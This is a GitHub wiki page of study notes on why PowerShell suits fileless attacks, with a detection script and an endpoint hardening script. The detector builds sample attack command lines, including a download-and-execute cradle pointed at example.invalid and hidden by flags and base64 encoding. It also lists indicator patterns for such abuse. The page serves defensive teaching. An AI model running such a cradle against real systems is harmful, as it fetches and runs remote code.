401D8 read26 - carlosjorr/reading-notes GitHub Wiki
Remote Code Execution
You just got a new job as a Cyber Threat Analyst, how would you explain your role to a family member?
My main goal is to detect and prevent any malicious activities or cyberattacks that could harm the organization's digital assets. I'll be analyzing data, identifying vulnerabilities, and developing strategies to defend against cyber threats. It's a bit like being a digital detective, working to keep our digital world safe from bad actors.
Explain what makes PowerShell such an effective attack vector.
Virus-infected files and malicious trojans are established malware types, and defenders have a range of detection and mitigation techniques against them: browsers verify downloaded files, applications need approved permissions before installation, and security software scans files as they are written, read, or executed and checks them against known signatures. Even malware delivered via Microsoft Office macros is obstructed by default settings that no longer allow automatic execution.
Attackers use fileless malware to get around these safeguards, either by injecting payloads into processes that are already running or by using scripting, so that no new executable ever lands on disk for a scanner to inspect. PowerShell is an ideal channel for delivering these attacks: it is installed on every modern Windows host, and through the .NET framework it can reach every part of the system (file system, registry, WMI, network, and the memory of other processes). Scripts for payload delivery are easy to write, and because PowerShell is a signed Microsoft binary that administrators rely on every day, it is almost never blocked outright; a malicious script runs inside a trusted process, typically launched with flags such as a hidden window and an encoded command so that the payload is not visible in the command line.
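The launch patterns described above (hidden window, execution-policy bypass, base64-encoded command carrying a download cradle) are what an analyst looks for in process-creation logs. The following PowerShell script is an added example, not code from the reading notes or from any product it mentions: it decodes an -EncodedCommand argument and scores command lines against a small set of indicators. The sample command lines, the regexes, the threshold of 2, and the hostname example.invalid are all constructed for illustration.

```powershell
# Added example, not code from the reading notes: triage PowerShell command lines
# (as logged by process-creation auditing, Event ID 4688, or Sysmon Event ID 1)
# for the tells of fileless delivery. All sample command lines are constructed.

function Expand-EncodedCommand {
    param([Parameter(Mandatory)][string]$CommandLine)
    # powershell.exe accepts -EncodedCommand or any unique prefix (-e, -ec, -enc, ...).
    $m = [regex]::Match($CommandLine, '(?i)\s-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]{16,})')
    if (-not $m.Success) { return $null }
    try {
        # The argument is base64 over UTF-16LE text, which is why these strings show runs of "A".
        return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[1].Value))
    } catch {
        return $null   # not valid base64: leave it to the other indicators
    }
}

function Test-SuspiciousPowerShell {
    param([Parameter(Mandatory)][string]$CommandLine)
    # Each indicator on its own is weak; the combination is what an analyst escalates on.
    $indicators = [ordered]@{
        EncodedCommand   = '(?i)\s-e(?:c|n\w*)?\s+[A-Za-z0-9+/=]{16,}'
        ExecPolicyBypass = '(?i)-ex\w*\s+bypass'
        HiddenWindow     = '(?i)-w(?:indowstyle)?\s+hidden'
        NonInteractive   = '(?i)-noni\w*'
        InvokeExpression = '(?i)\b(?:iex|invoke-expression)\b'
        RemoteDownload   = '(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient'
        InMemoryLoad     = '(?i)frombase64string|reflection\.assembly|virtualalloc'
    }
    $decoded = Expand-EncodedCommand -CommandLine $CommandLine
    # Search the decoded payload as well; otherwise the encoding hides everything that matters.
    $haystack = if ($decoded) { $CommandLine + "`n" + $decoded } else { $CommandLine }
    $hits = foreach ($name in $indicators.Keys) {
        if ($haystack -match $indicators[$name]) { $name }
    }
    [pscustomobject]@{
        CommandLine = $CommandLine
        Decoded     = $decoded
        Indicators  = @($hits)
        Score       = @($hits).Count
    }
}

# Constructed samples. The first encodes a typical download cradle the way an attacker would,
# so the encoded form is generated here rather than pasted in.
$cradle  = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage1')"
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cradle))
$SampleCommandLines = @(
    "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc $encoded",
    'powershell.exe -NoProfile -Command "IEX (New-Object Net.WebClient).DownloadString(''http://example.invalid/stage2'')"',
    'powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\Scripts\Backup-Logs.ps1'
)

# Only the first two samples reach the threshold; the scheduled backup script scores 0.
$SampleCommandLines |
    ForEach-Object { Test-SuspiciousPowerShell -CommandLine $_ } |
    Where-Object { $_.Score -ge 2 } |
    Format-List CommandLine, Decoded, Indicators, Score
```

Decoding the argument before matching is the important step: the first sample contains no readable "IEX" or "DownloadString" until it is decoded, which is exactly why attackers encode it. In a real deployment the indicator list would be tuned against the environment's own admin tooling, and an encoded command should also be cross-checked against the decoded script text that script block logging (Event ID 4104) records when it is enabled.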
What are two things you can do to mitigate attacks that leverage PowerShell?
Application Whitelisting: This involves creating a list of approved applications and scripts that are allowed to run on the system, enforced with AppLocker or Windows Defender Application Control. By only allowing known and trusted code, we can prevent unauthorized use of PowerShell or any other potentially harmful programs. A caveat: simply blocking powershell.exe is not enough on its own, because the PowerShell engine (System.Management.Automation.dll) can be loaded by other hosts; the allow list has to cover scripts and DLLs, not just the executable name.
Restricting PowerShell Usage: By limiting who can run PowerShell scripts and what those scripts can do, we can reduce the potential for abuse. Group Policy or local security settings can be used to put PowerShell into Constrained Language Mode, remove the legacy PowerShell 2.0 engine (which has neither logging nor language-mode restrictions and is a common downgrade target), and turn on script block logging, module logging, and transcription so that what does run is recorded. Note that the execution policy (Set-ExecutionPolicy) is not a security boundary; it is trivially bypassed with -ExecutionPolicy Bypass, so it should not be counted as a mitigation.
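To make the two mitigations concrete, here is an added example (not code from the reading notes) of a hardening script for endpoints that do not need unrestricted PowerShell: it enables the logging policies, removes the PowerShell 2.0 engine, and builds an AppLocker script rule set from a folder of approved scripts. The folder paths C:\ApprovedScripts and C:\PSTranscripts are assumptions, and the script must be run from an elevated prompt.

```powershell
# Added example, not code from the reading notes: harden an endpoint against PowerShell abuse.
# Run elevated. C:\ApprovedScripts and C:\PSTranscripts are assumed paths for this example.
#Requires -RunAsAdministrator

$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Enable-PowerShellLogging {
    # Script block logging writes the de-obfuscated script text as Event ID 4104 in
    # Microsoft-Windows-PowerShell/Operational, so an -EncodedCommand payload is logged decoded.
    New-Item -Path "$PolicyRoot\ScriptBlockLogging" -Force | Out-Null
    Set-ItemProperty -Path "$PolicyRoot\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -Type DWord

    # Module logging (Event ID 4103) records pipeline execution details; '*' covers every module.
    New-Item -Path "$PolicyRoot\ModuleLogging\ModuleNames" -Force | Out-Null
    Set-ItemProperty -Path "$PolicyRoot\ModuleLogging" -Name EnableModuleLogging -Value 1 -Type DWord
    Set-ItemProperty -Path "$PolicyRoot\ModuleLogging\ModuleNames" -Name '*' -Value '*'

    # Transcription writes complete session transcripts to a directory the SOC can collect.
    New-Item -Path "$PolicyRoot\Transcription" -Force | Out-Null
    Set-ItemProperty -Path "$PolicyRoot\Transcription" -Name EnableTranscripting -Value 1 -Type DWord
    Set-ItemProperty -Path "$PolicyRoot\Transcription" -Name EnableInvocationHeader -Value 1 -Type DWord
    Set-ItemProperty -Path "$PolicyRoot\Transcription" -Name OutputDirectory -Value 'C:\PSTranscripts'  # assumed path
}

function Disable-PowerShellV2 {
    # The v2 engine has no script block logging and no Constrained Language Mode, so
    # "powershell.exe -Version 2" would sidestep everything configured above.
    Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -NoRestart | Out-Null
}

function New-ScriptAllowListPolicy {
    param([string]$ApprovedScriptDir = 'C:\ApprovedScripts')  # assumed folder of reviewed scripts
    # Generate AppLocker script rules (publisher where signed, hash otherwise) from the approved
    # folder and merge them into the local policy. Once script rules are enforced, Windows
    # PowerShell 5 runs anything outside the allow list in ConstrainedLanguage mode.
    # Test with the collection in AuditOnly mode before switching to Enforce.
    $fileInfo = Get-AppLockerFileInformation -Directory $ApprovedScriptDir -Recurse -FileType Script
    $policy   = New-AppLockerPolicy -FileInformation $fileInfo -RuleType Publisher, Hash -User Everyone -Optimize
    Set-AppLockerPolicy -PolicyObject $policy -Merge
    # AppLocker only enforces while the Application Identity service is running; on current
    # Windows builds the service is protected, so sc.exe rather than Set-Service is used.
    sc.exe config appidsvc start= auto | Out-Null
    Start-Service -Name AppIDSvc
}

function Test-PowerShellHardening {
    # Quick verification object for a compliance check or a ticket.
    [pscustomobject]@{
        ScriptBlockLogging = (Get-ItemProperty "$PolicyRoot\ScriptBlockLogging" -ErrorAction SilentlyContinue).EnableScriptBlockLogging -eq 1
        Transcription      = (Get-ItemProperty "$PolicyRoot\Transcription" -ErrorAction SilentlyContinue).EnableTranscripting -eq 1
        V2EngineRemoved    = (Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root).State -ne 'Enabled'
        AppIdServiceRunning = (Get-Service -Name AppIDSvc).Status -eq 'Running'
        LanguageMode       = $ExecutionContext.SessionState.LanguageMode
    }
}

Enable-PowerShellLogging
Disable-PowerShellV2
New-ScriptAllowListPolicy
Test-PowerShellHardening
```

LanguageMode in the verification output will still read FullLanguage in the session that ran the script, since it was already in the allow list; a new session started from an unapproved script is where ConstrainedLanguage should appear. The script deliberately never touches Set-ExecutionPolicy, because an attacker passes -ExecutionPolicy Bypass on the command line and the policy has no effect on that.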